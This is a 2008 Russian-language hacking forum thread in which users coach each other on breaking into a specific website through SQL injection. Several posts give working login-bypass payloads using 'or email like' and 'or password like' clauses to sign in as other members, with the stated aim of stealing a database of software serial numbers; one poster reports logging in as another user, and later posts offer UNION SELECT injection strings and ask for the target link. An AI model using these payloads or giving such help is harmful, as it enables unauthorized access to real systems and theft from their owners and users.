HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.06.2008, 19:47
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию

1SeTh, никакого))
Попробуй заходить под другими мемберами. там есть какая-то база серийных номеров к программным продуктам. вот их можно спереть.
 
Ответить с цитированием

  #2  
Старый 10.06.2008, 20:28
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
С нами: 10646246

Репутация: 34
По умолчанию

да ты прав, можно нахляву получить серийники, только мемберов то я незнаю )

еще не понятно тогда как админ редактирует контент?

Последний раз редактировалось 1SeTh; 10.06.2008 в 20:32..
 
Ответить с цитированием

  #3  
Старый 10.06.2008, 22:07
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию

1SeTh, прописать в логин и пароль что-то типа
-99' or email like '%sergey%' /* -99 для того чтобы этой записи в бд точно не было, тогда сработает конструкция or
pass'/*
за место sergey подбираем слово, которое может входить в мыло.
 
Ответить с цитированием

  #4  
Старый 10.06.2008, 22:28
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
С нами: 10646246

Репутация: 34
По умолчанию

Цитата:
Сообщение от AFoST  
1SeTh, прописать в логин и пароль что-то типа
-99' or email like '%sergey%' /* -99 для того чтобы этой записи в бд точно не было, тогда сработает конструкция or
pass'/*
за место sergey подбираем слово, которое может входить в мыло.
я пробовал как ты сказал, как бы ни крутил только под логином админа заходишь.

вместо слово сергей поставил пару американских имен все равно заходить под логином Admin
 
Ответить с цитированием

  #5  
Старый 10.06.2008, 23:14
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию

1SeTh, я зашел под другим логином
вбиваем
pizda' or password like '%9%'/*
pizda' or password like '%9%'/*
входим под grease2
=))))
 
Ответить с цитированием

  #6  
Старый 10.06.2008, 23:33
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами: 9456679

Репутация: 97
По умолчанию

Ребят, прошу помощи.Через order by подобрал поля. Пытаюсь вывести через
index.php?ID=-19+UNION+SELECT+1,2,3/* -т.е. при неверном id, редиректит на др. страницу another.html
При запросе ID=19+UNION+SELECT+1,2,3/* не выводит ошибок, но и выводимых полей нет, id то верный.
Как можно обойти?
И вообще не первый раз встречаюсь с ситуацией,id=1593+order+by+12/* ошибка,id=1593+order+by+8/* нет ошибки,id=-1593+order+by+8/* редирект.Why?

Последний раз редактировалось Imperou$; 10.06.2008 в 23:41..
 
Ответить с цитированием

  #7  
Старый 10.06.2008, 23:39
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию

пробуй
ID=-1+UNION+SELECT+1,2,3/*
или
ID=19+and+1=0+UNION+SELECT+1,2,3/*
 
Ответить с цитированием

  #8  
Старый 10.06.2008, 23:56
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами: 9456679

Репутация: 97
По умолчанию

2 AFoST
К сожалению не прокатило. Но все равно спасибо за совет.
 
Ответить с цитированием

  #9  
Старый 10.06.2008, 23:57
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Imperou$
давай ссылку, и будет гораздо проще
 
Ответить с цитированием

  #10  
Старый 10.06.2008, 23:58
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию

jokester, именно
Imperou$, давай ссылку-будем вдуплять
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...